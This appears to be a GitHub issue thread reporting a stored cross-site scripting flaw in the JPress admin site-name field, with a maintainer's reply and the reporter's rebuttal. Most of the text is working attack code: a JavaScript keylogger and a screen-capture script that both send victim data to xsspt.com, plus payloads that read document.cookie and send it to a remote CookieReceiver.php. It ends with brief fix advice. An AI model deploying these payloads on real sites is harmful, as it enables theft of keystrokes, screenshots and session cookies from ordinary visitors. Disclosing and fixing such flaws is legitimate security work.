Closed zsdlove closed 4 years ago
@zsdlove,thanks for your issue, in my submission the site settings action is need webMaster's permissions,u can set any data if u are webMaster.
in this case , jpress must allow web master set javascript code for some place like 'copyright information'(版权信息) or 'statistical code'(统计代码)。
if u are web master,and u want attack your website by xss? rewrite your template directly.
1、Although,it need webMaster's permissions.buti if the malicious attackers use the social engineering to obtain the password,and then login in the backend.After that,he will have the permission to manipulated the website name.This loophole is far more harmful than your perception.The malicious attackers can insert a deceptive information(such as Deceptive URLs t which redict to the malicious attackers's website) into your frontend,if the normal user access your website,he or she will be decoyed by the deceptive information.And the harmfulness of storage xss is not only get the cookie from the web views,but also can do Keylogger and Intercepting the Web Screen below is the javascript code demo of keylogger:
(function(){
var logger = "";
keyDown = function(e)
{
var e=e||event;
var currKey=e.keyCode||e.which||e.charCode;
if((currKey>7&&currKey<32)||(currKey>31&&currKey<47))
{
switch(currKey)
{
case 8: keyName = "[退格]"; break;
case 9: keyName = "[制表]"; break;
case 13:keyName = "[回车]"; break;
//case 16:keyName = "[shift]"; break;
case 17:keyName = "[Ctrl]"; break;
case 18:keyName = "[Alt]"; break;
case 20:keyName = "[大小写]"; break;
case 32:keyName = "[空格]"; break;
case 33:keyName = "[PageUp]"; break;
case 34:keyName = "[PageDown]"; break;
case 35:keyName = "[End]"; break;
case 36:keyName = "[Home]"; break;
case 37:keyName = "[方向键左]"; break;
case 38:keyName = "[方向键上]"; break;
case 39:keyName = "[方向键右]"; break;
case 40:keyName = "[方向键下]"; break;
case 46:keyName = "[删除]"; break;
default:keyName = ""; break;
}
logger += keyName;
}
}
keyPress = function(e)
{
var currKey=0,CapsLock=0,e=e||event;
currKey=e.keyCode||e.which||e.charCode;
CapsLock=currKey>=65&&currKey<=90;
switch(currKey)
{
//屏蔽了退格、制表、回车、空格、方向键、删除键等
case 8: case 9:case 13:case 16:case 17:case 18:case 20:
case 32: case 33: case 34: case 35: case 36: case 37:case 38:
case 39:case 40:case 46:keyName = "";break;
default:keyName = String.fromCharCode(currKey); break;
}
logger += keyName;
}
sendChar = function()
{
if (!logger) return;
(new Image).src="http://xsspt.com/index.php?do=api&id={projectId}&char=" + logger; //服务端地址
logger = "";
}
formSubmit = function()
{
sendChar();
}
document.onkeydown = keyDown;
document.onkeypress = keyPress;
document.onsubmit = formSubmit;
setInterval(sendChar, 10000); //设置定时器
})();
below is the javascript code of Intercept Web Screen:
var headjt=document.getElementsByTagName("head")[0];var scriptjt1=document.createElement("script");var img="";scriptjt1.type="text/javascript";scriptjt1.onload=scriptjt1.onreadystatechange=function(){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){helpjt();scriptjt1.onload=scriptjt1.onreadystatechange=null}};scriptjt1.src="http://xsspt.com/js/html2canvas.js";headjt.appendChild(scriptjt1);function saveImageInfojt(canvas){var mycanvas=canvas;var image=mycanvas.toDataURL("image/png");img=image}function helpjt(){html2canvas(document.body).then(function(canvas){saveImageInfojt(canvas);(function(){xssinfo={};try{xssinfo["img"]=escape(img)}catch(e){xssinfo["img"]=""}var ajax=new XMLHttpRequest();ajax.open("POST","http://xsspt.com/index.php?do=api&dtype=json&model=jietu&id={projectId}");ajax.setRequestHeader("Content-type","text/plain");ajax.send(JSON.stringify(xssinfo));ajax.onreadystatechange=function(){if(ajax.readyState==4&&ajax.status==200){}}})()})};
Hi,guys,there is a storage type xss in your web application,which can be use for phishing. Vulnerability url: http://127.0.0.1:8080/starter-tomcat-1.0/admin/setting the flaws happened in this place: First of all: We use the payload below:
"><img src=i onerror=alert(document.cookie)>
And we can see that we get the cookies,by access the url: http://127.0.0.1:8080/starter-tomcat-1.0/ The fronend get the site name string from the backend without html entity encode. Due to the leak occurred at the front end,it may cause greater harm,such as Phishing. Below is the simple payload for xss phishing."><script>window.open('http://104.xxx.xxx.146/CookieReceiver.php?msg='+document.cookie)</script>
We enter the payload into the same place. Then we access the frontend http://127.0.0.1:8080/starter-tomcat-1.0/After the js code excuted at the frontend,it will send the cookie of the views to the remote service. Cookie receiver
Receiver Code:
Then we see the source code location of the flaws: Below is doing option change and save
We can see,It does not do any filtered for xss attact. There is a class for option storing which locations at Baseurl\jpress\jpress-commons\src\main\java\io\jpress\JPressConsts.java
Here we get the config information from JPressConsts,and then it will show in the front without html entity encode.
suggestuions: 1、 do xss filter. 2、 before ouput the values to the frontend,we should do html entity encode for it.
747289639@qq.com